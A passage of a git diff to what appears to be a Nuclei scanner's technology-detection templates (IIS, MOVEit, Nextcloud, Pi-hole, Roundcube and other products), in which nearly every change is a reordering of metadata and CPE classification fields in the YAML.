b/http/technologies/microsoft-iis-8.yaml @@ -4,15 +4,15 @@ info: name: Microsoft Internet Information Services 8 author: dhiyaneshDK severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Microsoft Internet Information Services 8" - product: iis - vendor: microsoft - tags: tech,iis,microsoft - classification: cpe: cpe:2.3:a:microsoft:iis:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: microsoft + product: iis + shodan-query: http.title:"Microsoft Internet Information Services 8" + tags: tech,iis,microsoft + http: - method: GET path: @@ -28,4 +28,4 @@ http: words: - "Microsoft Internet Information Services 8" -# digest: 490a0046304402207c703cffd4b0a0a9b0705df59cbf2e08ab5fbdd4a4bc5acbb80d5582d24de389022057bff6dddbcfffe322a128456fa490f1ec65aa458e358bee8396123d5823b07f:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207c703cffd4b0a0a9b0705df59cbf2e08ab5fbdd4a4bc5acbb80d5582d24de389022057bff6dddbcfffe322a128456fa490f1ec65aa458e358bee8396123d5823b07f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/microsoft/default-iis7-page.yaml b/http/technologies/microsoft/default-iis7-page.yaml index 1ee69be51c..8ade3d2d32 100644 --- a/http/technologies/microsoft/default-iis7-page.yaml +++ b/http/technologies/microsoft/default-iis7-page.yaml @@ -4,15 +4,15 @@ info: name: IIS-7 Default Page author: dhiyaneshDk severity: info - metadata: - max-request: 1 - shodan-query: http.title:"IIS7" - product: iis - vendor: microsoft - tags: tech,iis - classification: cpe: cpe:2.3:a:microsoft:iis:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: microsoft + product: iis + shodan-query: http.title:"IIS7" + tags: tech,iis + http: - method: GET path: @@ -24,4 +24,4 @@ http: - "IIS7" part: body -# digest: 490a004630440220106df1c73bb800bbeb3c95691cf354e888a39edfd1692f782be86ee5f84ddfc20220661ee4cd518f5840ebf89411b89bfb4d90c1482db4f4ab073464abbb2d77c6de:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220106df1c73bb800bbeb3c95691cf354e888a39edfd1692f782be86ee5f84ddfc20220661ee4cd518f5840ebf89411b89bfb4d90c1482db4f4ab073464abbb2d77c6de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/microsoft/default-microsoft-azure-page.yaml b/http/technologies/microsoft/default-microsoft-azure-page.yaml index 4a43422305..89d77066c4 100644 --- a/http/technologies/microsoft/default-microsoft-azure-page.yaml +++ b/http/technologies/microsoft/default-microsoft-azure-page.yaml @@ -4,15 +4,15 @@ info: name: Microsoft Azure Default Page author: dhiyaneshDk severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Microsoft Azure App Service - Welcome" - product: azure - vendor: microsoft - tags: tech,azure,microsoft - classification: cpe: cpe:2.3:a:microsoft:azure:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: microsoft + product: azure + shodan-query: http.title:"Microsoft Azure App Service - Welcome" + tags: tech,azure,microsoft + http: - method: GET path: @@ -24,4 +24,4 @@ http: - "Microsoft Azure App Service - Welcome" part: body -# digest: 490a0046304402207330c24a54f08d2ae9c282a9480d08b071f4334fa68d0fb4628e583e3d3f49cb0220783f449dcfd51a1ee6d4a35372a929f9848443c184a593d1decda27cd4158615:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207330c24a54f08d2ae9c282a9480d08b071f4334fa68d0fb4628e583e3d3f49cb0220783f449dcfd51a1ee6d4a35372a929f9848443c184a593d1decda27cd4158615:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/microsoft/default-windows-server-page.yaml b/http/technologies/microsoft/default-windows-server-page.yaml index 494fc15f59..9df1210a59 100644 --- a/http/technologies/microsoft/default-windows-server-page.yaml +++ b/http/technologies/microsoft/default-windows-server-page.yaml @@ -4,15 +4,15 @@ info: name: IIS Windows Server Default Page author: dhiyaneshDk severity: info - metadata: - max-request: 1 - shodan-query: http.title:"IIS Windows Server" - product: windows_server_2003 - vendor: microsoft - tags: tech,windows,iis - classification: cpe: cpe:2.3:o:microsoft:windows_server_2003:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: microsoft + product: windows_server_2003 + shodan-query: http.title:"IIS Windows Server" + tags: tech,windows,iis + http: - method: GET path: @@ -24,4 +24,4 @@ http: - "IIS Windows Server" part: body -# digest: 4a0a0047304502205f5a3ebc04457be48e6870581f21363f659847cbe306fd2217e3e6a723da7fa4022100c16034e650054918571fec4854471d6c6356fce16d97665b64f9e3879fb7e242:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205f5a3ebc04457be48e6870581f21363f659847cbe306fd2217e3e6a723da7fa4022100c16034e650054918571fec4854471d6c6356fce16d97665b64f9e3879fb7e242:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/mikrotik-httpproxy.yaml b/http/technologies/mikrotik-httpproxy.yaml index 966a495d6d..9e7828fd74 100644 --- a/http/technologies/mikrotik-httpproxy.yaml +++ b/http/technologies/mikrotik-httpproxy.yaml @@ -4,16 +4,16 @@ info: name: MikroTik httpproxy author: its0x08,DhiyaneshDk severity: info + classification: + cpe: cpe:2.3:h:mikrotik:rb3011uias-rm:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: 'Server: mikrotik httpproxy' - product: rb3011uias-rm vendor: mikrotik + product: rb3011uias-rm + shodan-query: 'Server: mikrotik httpproxy' tags: tech,mikrotik - classification: - cpe: cpe:2.3:h:mikrotik:rb3011uias-rm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +27,4 @@ http: - 'Server: Mikrotik HttpProxy' case-insensitive: true -# digest: 4a0a00473045022100e6cbe098b53eec4939795027f80f066d6767ce73bb350fe390324598a24fbe43022058cd7075662f7ce30bfbff210f10fa8ddb7b80e7a194dca72ab97e4e6791ff10:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e6cbe098b53eec4939795027f80f066d6767ce73bb350fe390324598a24fbe43022058cd7075662f7ce30bfbff210f10fa8ddb7b80e7a194dca72ab97e4e6791ff10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/mongoose-server.yaml b/http/technologies/mongoose-server.yaml index a7e83405b7..41540bfc16 100644 --- a/http/technologies/mongoose-server.yaml +++ b/http/technologies/mongoose-server.yaml @@ -8,16 +8,16 @@ info: Mongoose is a embedded web server reference: - https://github.com/cesanta/mongoose + classification: + cpe: cpe:2.3:a:cesanta:mongoose:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: 'Server: Mongoose' - product: mongoose vendor: cesanta + product: mongoose + shodan-query: 'Server: Mongoose' tags: tech,mongoose - classification: - cpe: cpe:2.3:a:cesanta:mongoose:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +34,4 @@ http: status: - 200 -# digest: 490a0046304402205facb55edb39813cbf3fe7a9b84fac40471c8cced8bc6b16ff65f466c218e18f02206528133c2c8aa9306ddb5986e0a9044827e02513ca6737e2c7bc512147926ed4:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205facb55edb39813cbf3fe7a9b84fac40471c8cced8bc6b16ff65f466c218e18f02206528133c2c8aa9306ddb5986e0a9044827e02513ca6737e2c7bc512147926ed4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/moveit-transfer-detect.yaml b/http/technologies/moveit-transfer-detect.yaml index 63774913af..4edd81cdef 100644 --- a/http/technologies/moveit-transfer-detect.yaml +++ b/http/technologies/moveit-transfer-detect.yaml @@ -4,16 +4,16 @@ info: name: Moveit File Transfer - Detect author: tess severity: info + classification: + cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: html:"human.aspx" - product: moveit_transfer vendor: progress + product: moveit_transfer + shodan-query: html:"human.aspx" tags: tech,moveit - classification: - cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +38,4 @@ http: status: - 200 -# digest: 4a0a00473045022100ce8b47477d2640d59a6879906574e3c628b07f4bc38a61a385b239d74453f34d02204c1c027d84cf76e60e97f36e85c084ceee87102e9a83b6363e1b6508ecaa6a6a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ce8b47477d2640d59a6879906574e3c628b07f4bc38a61a385b239d74453f34d02204c1c027d84cf76e60e97f36e85c084ceee87102e9a83b6363e1b6508ecaa6a6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/nextcloud-detect.yaml b/http/technologies/nextcloud-detect.yaml index 27b8824455..40f6042fe6 100644 --- a/http/technologies/nextcloud-detect.yaml +++ b/http/technologies/nextcloud-detect.yaml @@ -8,16 +8,16 @@ info: Nextcloud is a suite of client-server software for creating and using file hosting services reference: - https://nextcloud.com + classification: + cpe: cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 - shodan-query: http.title:"Nextcloud" - product: nextcloud_server vendor: nextcloud + product: nextcloud_server + shodan-query: http.title:"Nextcloud" tags: tech,nextcloud,storage - classification: - cpe: cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -49,4 +49,4 @@ http: regex: - '(?m)"version":"([0-9.]+)",' -# digest: 4a0a00473045022100938d847bcc0b475ce2db2df8e93fd72beee7d2c05e3bbbfc840ca2c2a18d9fc202207734d0da58a3f16e28e0b30902d898f0e7f4b8f86b4b583c684b807a199013c0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100938d847bcc0b475ce2db2df8e93fd72beee7d2c05e3bbbfc840ca2c2a18d9fc202207734d0da58a3f16e28e0b30902d898f0e7f4b8f86b4b583c684b807a199013c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/nextcloud-owncloud-detect.yaml b/http/technologies/nextcloud-owncloud-detect.yaml index 0ecd99d44f..1fd832ba7c 100644 --- a/http/technologies/nextcloud-owncloud-detect.yaml +++ b/http/technologies/nextcloud-owncloud-detect.yaml @@ -4,16 +4,16 @@ info: name: Owncloud StatusPage detection author: myztique,invisiblethreat severity: info + classification: + cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"owncloud" - product: owncloud vendor: owncloud + product: owncloud + shodan-query: http.html:"owncloud" tags: tech,owncloud,status - classification: - cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: json json: - .version -# digest: 490a004630440220740dda35113ef3bee6f0e7b482c1610bee7a6241dfae549e0861eac1f245cb8502200819eae06d45104e3870e12454721296efc0e4ca0abbea217e1303ef840e1933:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220740dda35113ef3bee6f0e7b482c1610bee7a6241dfae549e0861eac1f245cb8502200819eae06d45104e3870e12454721296efc0e4ca0abbea217e1303ef840e1933:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/nexus-detect.yaml b/http/technologies/nexus-detect.yaml index 194d64704c..515ac9f11d 100644 --- a/http/technologies/nexus-detect.yaml +++ b/http/technologies/nexus-detect.yaml @@ -6,16 +6,16 @@ info: severity: info description: | Try to detect the presence of a NRM instance via the REST API OpenDocument descriptor. + classification: + cpe: cpe:2.3:a:sonatype:nexus_repository_manager:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"Nexus Repository Manager" - product: nexus_repository_manager vendor: sonatype + product: nexus_repository_manager + shodan-query: http.html:"Nexus Repository Manager" tags: tech,nexus - classification: - cpe: cpe:2.3:a:sonatype:nexus_repository_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,4 @@ http: status: - 200 -# digest: 490a00463044022075020f3559219198e725c4825133fd0b11ace23039e4af75f3e61d5617989a8a022029d07b425c608d2851b865ec5f08e13de5357ca1e2b03526ae890beb6747737a:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022075020f3559219198e725c4825133fd0b11ace23039e4af75f3e61d5617989a8a022029d07b425c608d2851b865ec5f08e13de5357ca1e2b03526ae890beb6747737a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/notion-detect.yaml b/http/technologies/notion-detect.yaml index ec500901bf..1e7312a0f2 100644 --- a/http/technologies/notion-detect.yaml +++ b/http/technologies/notion-detect.yaml @@ -4,16 +4,16 @@ info: name: Notion Detect author: tess severity: info + classification: + cpe: cpe:2.3:a:notion:notion:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Notion – One workspace. Every team." - product: notion vendor: notion + product: notion + shodan-query: title:"Notion – One workspace. Every team." tags: notion,tech - classification: - cpe: cpe:2.3:a:notion:notion:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,4 @@ http: status: - 200 -# digest: 490a0046304402205cd92659d7d1c758ad8d1b701baeedc9bc8de2a30599f3c8e294c11b64a3d6d302202ba5f4ed9df1051dcb55c431313a99d513136b40bfb5b2216005ad2077ad260b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205cd92659d7d1c758ad8d1b701baeedc9bc8de2a30599f3c8e294c11b64a3d6d302202ba5f4ed9df1051dcb55c431313a99d513136b40bfb5b2216005ad2077ad260b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/open-journal-systems.yaml b/http/technologies/open-journal-systems.yaml index c19a053f07..73bbc9a48c 100644 --- a/http/technologies/open-journal-systems.yaml +++ b/http/technologies/open-journal-systems.yaml @@ -7,16 +7,16 @@ info: description: Open Journal Systems, also known as OJS, is a free software for the management of peer-reviewed academic journals, created by the Public Knowledge Project. reference: - https://pkp.sfu.ca/ojs/ + classification: + cpe: cpe:2.3:a:openjournalsystems:open_journal_systems:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Open Journal Systems" - product: open_journal_systems vendor: openjournalsystems + product: open_journal_systems + shodan-query: html:"Open Journal Systems" tags: tech,ojs - classification: - cpe: cpe:2.3:a:openjournalsystems:open_journal_systems:*:*:*:*:*:*:*:* http: - method: GET path: @@ -43,4 +43,4 @@ http: regex: - '(?i).*' -# digest: 4b0a00483046022100edfa90d95a16e5ad6dbbc7aa6599860dffea77af40508e1438c3f1fce891fc44022100d44e634080a7f3d35f606f9f8adf3e28e9ba8a1344ccd2e83e3dba541691b09a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100edfa90d95a16e5ad6dbbc7aa6599860dffea77af40508e1438c3f1fce891fc44022100d44e634080a7f3d35f606f9f8adf3e28e9ba8a1344ccd2e83e3dba541691b09a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/pexip-detect.yaml b/http/technologies/pexip-detect.yaml index bd98695b84..aae3f1c38c 100644 --- a/http/technologies/pexip-detect.yaml +++ b/http/technologies/pexip-detect.yaml @@ -8,16 +8,16 @@ info: Pexip technology was detected. reference: - https://www.pexip.com/ + classification: + cpe: cpe:2.3:a:pexip:pexip_infinity:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"Pexip Connect for Web" - product: pexip_infinity vendor: pexip + product: pexip_infinity + shodan-query: http.title:"Pexip Connect for Web" tags: tech,pexip,detect - classification: - cpe: cpe:2.3:a:pexip:pexip_infinity:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: - 'status_code == 200' - 'contains(body, "Pexip Connect for Web")' condition: and -# digest: 4a0a00473045022100af90ef4c39425515f15c2a49b1dd07e74bd26aba0fd5b7fdf4de51affef88aa7022030abc0a04cf5ed0a09b15afb4369b37bd3c3ccb275ae30cb4315691302e28aa0:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100af90ef4c39425515f15c2a49b1dd07e74bd26aba0fd5b7fdf4de51affef88aa7022030abc0a04cf5ed0a09b15afb4369b37bd3c3ccb275ae30cb4315691302e28aa0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/php-detect.yaml b/http/technologies/php-detect.yaml index 65d194988d..508bfec718 100644 --- a/http/technologies/php-detect.yaml +++ b/http/technologies/php-detect.yaml @@ -4,16 +4,16 @@ info: name: PHP Detect author: y0no severity: info + classification: + cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: "X-Powered-By: PHP" - product: php vendor: php + product: php + shodan-query: "X-Powered-By: PHP" tags: tech,php - classification: - cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,4 @@ http: regex: - "X-Powered-By: PHP/([0-9.]+)" -# digest: 4a0a00473045022021b5a2388194fe5e59ae13ee2b2ee1bbdeb8f2f1f1e38184c16fa43d18d722a7022100ab79d74f3b461c9665ec30d646ad1b187c83731579a582e46f5e0107e6957a59:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022021b5a2388194fe5e59ae13ee2b2ee1bbdeb8f2f1f1e38184c16fa43d18d722a7022100ab79d74f3b461c9665ec30d646ad1b187c83731579a582e46f5e0107e6957a59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/php-fusion-detect.yaml b/http/technologies/php-fusion-detect.yaml index 4acdcb1044..03f56b4d2a 100644 --- a/http/technologies/php-fusion-detect.yaml +++ b/http/technologies/php-fusion-detect.yaml @@ -4,15 +4,15 @@ info: name: PHP Fusion Detect author: pikpikcu severity: info - metadata: - max-request: 1 - fofa-query: title="PHP-Fusion" - product: php-fusion - vendor: php-fusion - tags: php,tech,php-fusion - classification: cpe: cpe:2.3:a:php-fusion:php-fusion:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: php-fusion + product: php-fusion + fofa-query: title="PHP-Fusion" + tags: php,tech,php-fusion + http: - method: GET path: @@ -32,4 +32,4 @@ http: status: - 200 -# digest: 490a004630440220026b8c32a04a1df62ff2fe2fdbac75bbb8a0a0eaaa4b7f20f513e433f2dd56f20220517dfc1f2e3c46ee33743cbeaae7d56911292900234ecc543e18b715576ec448:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220026b8c32a04a1df62ff2fe2fdbac75bbb8a0a0eaaa4b7f20f513e433f2dd56f20220517dfc1f2e3c46ee33743cbeaae7d56911292900234ecc543e18b715576ec448:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/phplist-detect.yaml b/http/technologies/phplist-detect.yaml index 587d63f0f0..96329d6497 100644 --- a/http/technologies/phplist-detect.yaml +++ b/http/technologies/phplist-detect.yaml @@ -8,16 +8,16 @@ info: phpList is an open source newsletter manager. reference: - https://www.phplist.org/ + classification: + cpe: cpe:2.3:a:phplist:phplist:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"phplist" - product: phplist vendor: phplist + product: phplist + shodan-query: html:"phplist" tags: tech,phplist,detect - classification: - cpe: cpe:2.3:a:phplist:phplist:*:*:*:*:*:*:*:* http: - method: GET path: @@ -43,4 +43,4 @@ http: regex: - '(?i)version.((\d\.?)+)' -# digest: 4b0a00483046022100b9689d0d38d96a02736636f6b53b41e7c80d65679297db556f6cc0eea8c2417c022100bbdd5891a3b8f5a2ac5070c9420030c82f3bbfcd1d405bf0403634c13c695a61:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b9689d0d38d96a02736636f6b53b41e7c80d65679297db556f6cc0eea8c2417c022100bbdd5891a3b8f5a2ac5070c9420030c82f3bbfcd1d405bf0403634c13c695a61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/pi-hole-detect.yaml b/http/technologies/pi-hole-detect.yaml index 7468868d29..5968955752 100644 --- a/http/technologies/pi-hole-detect.yaml +++ b/http/technologies/pi-hole-detect.yaml @@ -4,16 +4,16 @@ info: name: Pi-hole Login Panel - Detect author: geeknik severity: info + classification: + cpe: cpe:2.3:a:pi-hole:pi-hole:*:*:*:*:*:*:*:* metadata: verified: true max-request: 5 - shodan-query: title:"Pi-hole" - product: pi-hole vendor: pi-hole + product: pi-hole + shodan-query: title:"Pi-hole" tags: tech,pihole,detect - classification: - cpe: cpe:2.3:a:pi-hole:pi-hole:*:*:*:*:*:*:*:* http: - method: GET path: @@ -46,4 +46,4 @@ http: - '<pre>sudo pihole -a -p</pre>' condition: or -# digest: 4a0a004730450221009511ed20ff8a713868173492874903c4b35a6b12b75b7e269d9214761e78a3d902203e3ab0c415a7ae733830279981ab17b3f79b579eefad7d501ed415147f7ed15d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009511ed20ff8a713868173492874903c4b35a6b12b75b7e269d9214761e78a3d902203e3ab0c415a7ae733830279981ab17b3f79b579eefad7d501ed415147f7ed15d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/prestashop-detect.yaml b/http/technologies/prestashop-detect.yaml index 5bee19282e..d7b4e39ef8 100644 --- a/http/technologies/prestashop-detect.yaml +++ b/http/technologies/prestashop-detect.yaml @@ -4,15 +4,15 @@ info: name: PrestaShop Tech Detection author: pdteam severity: info - metadata: - max-request: 1 - shodan-query: http.component:"PrestaShop" - product: prestashop - vendor: prestashop - tags: tech,cms,prestashop - classification: cpe: cpe:2.3:a:prestashop:prestashop:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: prestashop + product: prestashop + shodan-query: http.component:"PrestaShop" + tags: tech,cms,prestashop + http: - method: GET path: @@ -29,4 +29,4 @@ http: - <!-- /Module Block [a-z ]+ --> condition: or -# digest: 4a0a00473045022100aa670ea1eb9e839c6b4137d2b9c18582caf4785c1330d4cd45ea719821a3cb2d0220048dc0c167ede9836ccc1f5825e83f7316c440865ab72b6abbe86d5ba8e5189c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100aa670ea1eb9e839c6b4137d2b9c18582caf4785c1330d4cd45ea719821a3cb2d0220048dc0c167ede9836ccc1f5825e83f7316c440865ab72b6abbe86d5ba8e5189c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/privatebin-detect.yaml b/http/technologies/privatebin-detect.yaml index 696c6bded2..7ef5c6e02a 100644 --- a/http/technologies/privatebin-detect.yaml +++ b/http/technologies/privatebin-detect.yaml @@ -8,16 +8,16 @@ info: PrivateBin was detected. reference: - https://privatebin.info/ + classification: + cpe: cpe:2.3:a:privatebin:privatebin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"PrivateBin" - product: privatebin vendor: privatebin + product: privatebin + shodan-query: title:"PrivateBin" tags: tech,privatebin,detect - classification: - cpe: cpe:2.3:a:privatebin:privatebin:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,7 +25,6 @@ http: redirects: true max-redirects: 2 - matchers: - type: dsl dsl: @@ -39,4 +38,5 @@ http: group: 1 regex: - 'privatebin\.[a-z]{2,3}\?([0-9.]+)' -# digest: 4a0a0047304502206c206521a18dcd4cbf7969b932bde363b8a28fd9e14a007680371285886235920221008efa426ddef32b50823c5167f532ec7462c91ed4ec6a62ef841eec9e5451a632:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502206c206521a18dcd4cbf7969b932bde363b8a28fd9e14a007680371285886235920221008efa426ddef32b50823c5167f532ec7462c91ed4ec6a62ef841eec9e5451a632:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/pypiserver-detect.yaml b/http/technologies/pypiserver-detect.yaml index 64540cb611..e2d2d69a76 100644 --- a/http/technologies/pypiserver-detect.yaml +++ b/http/technologies/pypiserver-detect.yaml @@ -4,16 +4,16 @@ info: name: PyPI Server Detect author: ritikchaddha severity: info + classification: + cpe: cpe:2.3:a:python:pypiserver:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"pypiserver" - product: pypiserver vendor: python + product: pypiserver + shodan-query: html:"pypiserver" tags: tech,pypiserver - classification: - cpe: cpe:2.3:a:python:pypiserver:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,4 @@ http: status: - 200 -# digest: 4b0a00483046022100fc44bde578f2b819b0c96d48de1a86c508e6ef8d52046eb98329838828665114022100baca4486225d0b9c20fed6b873155c1f7f3eae449f11af59165f48aebdaf8c36:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fc44bde578f2b819b0c96d48de1a86c508e6ef8d52046eb98329838828665114022100baca4486225d0b9c20fed6b873155c1f7f3eae449f11af59165f48aebdaf8c36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/roundcube-webmail-portal.yaml b/http/technologies/roundcube-webmail-portal.yaml index ec104fbe4c..38c334294e 100644 --- a/http/technologies/roundcube-webmail-portal.yaml +++ b/http/technologies/roundcube-webmail-portal.yaml @@ -4,15 +4,15 @@ info: name: Roundcube webmail author: ritikchaddha severity: info - metadata: - max-request: 2 - shodan-query: http.component:"RoundCube" - product: webmail - vendor: roundcube - tags: roundcube,portal,tech - classification: cpe: cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: roundcube + product: webmail + shodan-query: http.component:"RoundCube" + tags: roundcube,portal,tech + http: - method: GET path: @@ -34,4 +34,4 @@ http: status: - 200 -# digest: 4a0a00473045022100cc0fcb584c07dc0e6c7a86e20ded10bf65da2c31d36dd1f0bb1dcc52c576c19d02207201127b2fb95b43564d996fd5affa82ef7b95645890a5ce2a82737752d1520a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cc0fcb584c07dc0e6c7a86e20ded10bf65da2c31d36dd1f0bb1dcc52c576c19d02207201127b2fb95b43564d996fd5affa82ef7b95645890a5ce2a82737752d1520a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/rseenet-detect.yaml b/http/technologies/rseenet-detect.yaml index d794cb9861..6e41d3a00e 100644 --- a/http/technologies/rseenet-detect.yaml +++ b/http/technologies/rseenet-detect.yaml @@ -6,6 +6,8 @@ info: severity: info reference: - https://icr.advantech.cz/products/software/r-seenet + classification: + cpe: cpe:2.3:a:advantech:r-seenet:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"R-SeeNet" @@ -13,8 +15,6 @@ info: vendor: advantech tags: tech,rseenet - classification: - cpe: cpe:2.3:a:advantech:r-seenet:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/rsshub-detect.yaml b/http/technologies/rsshub-detect.yaml index d8d6ac9cd8..df03a2c32e 100644 --- a/http/technologies/rsshub-detect.yaml +++ b/http/technologies/rsshub-detect.yaml @@ -4,16 +4,16 @@ info: name: RSSHub Detect author: ritikchaddha severity: info + classification: + cpe: cpe:2.3:a:rsshub:rsshub:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:-1893514038 - product: rsshub vendor: rsshub + product: rsshub + shodan-query: http.favicon.hash:-1893514038 tags: tech,rsshub - classification: - cpe: cpe:2.3:a:rsshub:rsshub:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +26,4 @@ http: dsl: - "('-1893514038' == mmh3(base64_py(body)))" -# digest: 4a0a0047304502200b930007fba7016c9a7d06be164a695e5dd532efbccae63f6cefd26211d94536022100d04c76687ce953ec82e729b1b4402d2608d46e7baf6bcfe3a2392322aa11ab08:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200b930007fba7016c9a7d06be164a695e5dd532efbccae63f6cefd26211d94536022100d04c76687ce953ec82e729b1b4402d2608d46e7baf6bcfe3a2392322aa11ab08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/samsung-smarttv-debug.yaml b/http/technologies/samsung-smarttv-debug.yaml index 08c80fb9a4..830acbdf0f 100644 --- a/http/technologies/samsung-smarttv-debug.yaml +++ b/http/technologies/samsung-smarttv-debug.yaml @@ -4,16 +4,16 @@ info: name: Samsung SmartTV Debug Config author: pussycat0x severity: info + classification: + cpe: cpe:2.3:o:samsung:nt14u_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Debug Config" - product: nt14u_firmware vendor: samsung + product: nt14u_firmware + shodan-query: title:"Debug Config" tags: samsung,tech,iot - classification: - cpe: cpe:2.3:o:samsung:nt14u_firmware:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,4 @@ http: status: - 200 -# digest: 490a0046304402203d300a937bbfb64879cf0fa0b76e8939622b06d84954d8ece5e0f9355da6b7d0022002369bcc085f65a53ee1753578d19ed97c4615a7e129ec9ec303ce8ba68bb922:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203d300a937bbfb64879cf0fa0b76e8939622b06d84954d8ece5e0f9355da6b7d0022002369bcc085f65a53ee1753578d19ed97c4615a7e129ec9ec303ce8ba68bb922:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/sharefile-storage-server.yaml b/http/technologies/sharefile-storage-server.yaml index c922ea0ecc..a926b513b5 100644 --- a/http/technologies/sharefile-storage-server.yaml +++ b/http/technologies/sharefile-storage-server.yaml @@ -4,16 +4,16 @@ info: name: ShareFile Storage Server - Detect author: DhiyaneshDK severity: info + classification: + cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"ShareFile Storage Server" - product: sharefile_storage_zones_controller vendor: citrix + product: sharefile_storage_zones_controller + shodan-query: title:"ShareFile Storage Server" tags: tech,citrix,sharefile - classification: - cpe: 